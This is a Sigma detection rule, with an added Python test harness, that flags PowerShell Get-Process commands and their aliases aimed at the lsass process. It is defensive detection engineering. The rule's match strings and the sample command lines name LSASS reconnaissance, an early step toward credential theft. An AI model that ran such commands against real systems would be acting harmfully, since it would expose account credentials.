PowerShell Get-Process LSASS
Detects a "Get-Process" cmdlet and its aliases targeting the lsass process, which is in almost all cases a sign of malicious activity
Sigma rule
```yaml
title: PowerShell Get-Process LSASS
id: b2815d0d-7481-4bf0-9b6c-a4c48a94b349
status: test
description: Detects a "Get-Process" cmdlet and its aliases on lsass process, which is in almost all cases a sign of malicious activity
references:
    - https://web.archive.org/web/20220205033028/https://twitter.com/PythonResponder/status/1385064506049630211
author: Florian Roth (Nextron Systems)
date: 2021-04-23
modified: 2023-01-05
tags:
    - attack.credential-access
    - attack.t1552.004
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        CommandLine|contains:
            # You can add more permutation as you see fit
            - 'Get-Process lsas'
            - 'ps lsas'
            - 'gps lsas'
    condition: selection
falsepositives:
    - Unknown
level: high
```
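To show what this rule's `CommandLine|contains` selection actually fires on, the following added example (not part of the rule or of the Sigma project) re-implements the detection section in Python and runs it over constructed process_creation events; the event dicts and the `SELECTION_CONTAINS` list are assumptions that mirror the rule above, and Sigma's `contains` is treated as a case-insensitive substring match, which is its default behaviour.

```python
# Stand-in for the rule's `selection` block: the three substrings from the YAML.
# Constructed here by hand, not parsed from the rule file.
SELECTION_CONTAINS = ["Get-Process lsas", "ps lsas", "gps lsas"]


def sigma_contains(field_value: str, needle: str) -> bool:
    """Sigma's `contains` modifier: case-insensitive substring match."""
    return needle.lower() in field_value.lower()


def matches_rule(event: dict) -> bool:
    """Evaluate `condition: selection` for one process_creation event.

    The rule has no Image filter, so only CommandLine is inspected; a list
    under `CommandLine|contains` is OR-ed, so any one substring is enough.
    """
    cmdline = event.get("CommandLine", "")
    return any(sigma_contains(cmdline, needle) for needle in SELECTION_CONTAINS)


# Constructed sample events (not real telemetry). The first two should fire,
# the third is a benign Get-Process call, the fourth is not PowerShell at all.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe Get-Process lsass"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": 'powershell -c "GPS LSASS | select Id"'},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe Get-Process explorer"},
    {"Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd.exe /c tasklist"},
]


def evaluate(events: list) -> list:
    """Return (CommandLine, matched) pairs so a detection engineer can eyeball hits."""
    return [(e.get("CommandLine", ""), matches_rule(e)) for e in events]


if __name__ == "__main__":
    for cmdline, hit in evaluate(SAMPLE_EVENTS):
        print(f"{'ALERT ' if hit else 'ok    '} {cmdline}")
```

Because `'ps lsas'` is a bare substring, the first sample matches it as well as `'Get-Process lsas'`; when tuning the "Unknown" false positives, check which of the three strings produced each hit.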
Related rules
- Certificate Exported Via PowerShell
- Certificate Exported Via PowerShell - ScriptBlock
- Cisco Crypto Commands
- Private Keys Reconnaissance Via CommandLine Tools
- Suspicious PFX File Creation